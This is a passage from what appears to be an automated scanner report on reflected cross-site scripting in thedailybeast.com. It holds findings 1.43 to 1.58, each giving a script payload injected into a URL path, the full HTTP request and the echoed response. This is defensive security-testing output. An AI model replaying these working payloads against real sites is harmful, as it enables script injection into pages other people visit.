Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet8fd9c"><script>alert(1)</script>52e16d6aac3/newsmaker/politics/"/>
...[SNIP]...

1.43. http://www.thedailybeast.com/cheat-sheet/newsmaker/politics/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/politics/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125d5"><script>alert(1)</script>4cb3ea5c33b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/newsmaker125d5"><script>alert(1)</script>4cb3ea5c33b/politics/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/newsmaker125d5"><script>alert(1)</script>4cb3ea5c33b/politics/"/>
...[SNIP]...

1.44. http://www.thedailybeast.com/cheat-sheet/newsmaker/politics/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/politics/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe296"><script>alert(1)</script>82cd4f36492 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/newsmaker/politicsfe296"><script>alert(1)</script>82cd4f36492/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:11 GMT
Content-Length: 12043
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/newsmaker/politicsfe296"><script>alert(1)</script>82cd4f36492/"/>
...[SNIP]...

1.45. http://www.thedailybeast.com/cheat-sheet/newsmaker/sexybeast/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/sexybeast/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d881"><script>alert(1)</script>1cb4708a43b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet6d881"><script>alert(1)</script>1cb4708a43b/newsmaker/sexybeast/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet6d881"><script>alert(1)</script>1cb4708a43b/newsmaker/sexybeast/"/>
...[SNIP]...

1.46. http://www.thedailybeast.com/cheat-sheet/newsmaker/sexybeast/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/sexybeast/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cbdc"><script>alert(1)</script>d4df2ab6c80 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/newsmaker7cbdc"><script>alert(1)</script>d4df2ab6c80/sexybeast/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/newsmaker7cbdc"><script>alert(1)</script>d4df2ab6c80/sexybeast/"/>
...[SNIP]...

1.47. http://www.thedailybeast.com/cheat-sheet/newsmaker/sexybeast/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/sexybeast/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6209b"><script>alert(1)</script>4a1b4c9a971 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/newsmaker/sexybeast6209b"><script>alert(1)</script>4a1b4c9a971/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:48 GMT
Content-Length: 12044
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/newsmaker/sexybeast6209b"><script>alert(1)</script>4a1b4c9a971/"/>
...[SNIP]...

1.48. http://www.thedailybeast.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43b4b"><script>alert(1)</script>0e66556ac65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico43b4b"><script>alert(1)</script>0e66556ac65 HTTP/1.1
Host: www.thedailybeast.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=157974911.245470979.1289685366.1289685366.1289685366.1; __utmc=157974911; __utmb=157974911.1.10.1289685366; __unam=c84b8fc-12c473cf84c-7e5976b8-1; __qca=P0-1101498677-1289685372894; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:49 GMT
Connection: close
Content-Length: 58560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/favicon.ico43b4b"><script>alert(1)</script>0e66556ac65"/>
...[SNIP]...

1.49. http://www.thedailybeast.com/galleries/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25494"><script>alert(1)</script>9c5e8f26c2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries25494"><script>alert(1)</script>9c5e8f26c2b/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:56:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries25494"><script>alert(1)</script>9c5e8f26c2b/"/>
...[SNIP]...

1.50. http://www.thedailybeast.com/galleries/newsmaker/innovation/idea/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/innovation/idea/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 784e6"><script>alert(1)</script>3969eaa15a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries784e6"><script>alert(1)</script>3969eaa15a/newsmaker/innovation/idea/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries784e6"><script>alert(1)</script>3969eaa15a/newsmaker/innovation/idea/"/>
...[SNIP]...

1.51. http://www.thedailybeast.com/galleries/newsmaker/innovation/idea/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/innovation/idea/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb3aa"><script>alert(1)</script>4df65145411 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries/newsmakerfb3aa"><script>alert(1)</script>4df65145411/innovation/idea/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries/newsmakerfb3aa"><script>alert(1)</script>4df65145411/innovation/idea/"/>
...[SNIP]...

1.52. http://www.thedailybeast.com/galleries/newsmaker/innovation/idea/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/innovation/idea/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46dcc"><script>alert(1)</script>29ede3e05a4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries/newsmaker/innovation/idea46dcc"><script>alert(1)</script>29ede3e05a4/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries/newsmaker/innovation/idea46dcc"><script>alert(1)</script>29ede3e05a4/"/>
...[SNIP]...

1.53. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/high-gloss/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/high-gloss/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c98b1"><script>alert(1)</script>e96070ef45d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleriesc98b1"><script>alert(1)</script>e96070ef45d/newsmaker/sexybeast/high-gloss/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleriesc98b1"><script>alert(1)</script>e96070ef45d/newsmaker/sexybeast/high-gloss/"/>
...[SNIP]...

1.54. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/high-gloss/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/high-gloss/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81cb2"><script>alert(1)</script>3913c88e43d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries/newsmaker81cb2"><script>alert(1)</script>3913c88e43d/sexybeast/high-gloss/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries/newsmaker81cb2"><script>alert(1)</script>3913c88e43d/sexybeast/high-gloss/"/>
...[SNIP]...

1.55. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/high-gloss/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/high-gloss/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c498"><script>alert(1)</script>58a363b321e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries/newsmaker/sexybeast/high-gloss8c498"><script>alert(1)</script>58a363b321e/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries/newsmaker/sexybeast/high-gloss8c498"><script>alert(1)</script>58a363b321e/"/>
...[SNIP]...

1.56. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/picture-show/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/picture-show/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f9b"><script>alert(1)</script>8ca3f390008 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleriesb6f9b"><script>alert(1)</script>8ca3f390008/newsmaker/sexybeast/picture-show/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleriesb6f9b"><script>alert(1)</script>8ca3f390008/newsmaker/sexybeast/picture-show/"/>
...[SNIP]...

1.57. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/picture-show/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/picture-show/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8656d"><script>alert(1)</script>190d11de225 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries/newsmaker8656d"><script>alert(1)</script>190d11de225/sexybeast/picture-show/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries/newsmaker8656d"><script>alert(1)</script>190d11de225/sexybeast/picture-show/"/>
...[SNIP]...

1.58. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/picture-show/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/picture-show/

Issue detail

